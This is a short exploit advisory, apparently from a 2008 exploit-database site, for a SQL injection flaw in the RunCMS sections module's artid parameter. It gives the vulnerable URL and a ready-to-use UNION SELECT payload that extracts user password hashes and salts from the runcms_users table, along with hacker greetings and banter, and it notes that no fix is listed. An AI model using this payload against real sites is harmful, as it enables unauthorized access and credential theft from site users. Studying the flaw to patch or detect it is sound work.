RunCMS Module section (artid) Remote SQL Injection Vulnerability

2008-03-20 00:00:00

Cr@zy_King

[email protected] / hackshow.us

Grtz : Crackers_Child - str0ke - 3php - Alemin_Krali - Eno7 - DreamTurk - The_Bekir - Mhzr91

Runcms Module Section (artid) Remote Sql Ä°nj. Vuln.

Example :

- modules/sections/index.php?op=viewarticle&artid=Sql

- Sql : 1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2

Cr@ Says : Kurtlar Vadisinde Memati Ã–lmeyecek kimse heyecanlanmasÄ±n :D

Alemin_Krali Says : Aynen katÄ±lÄ±yorum (ne alaka ise a.q)

Good.

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.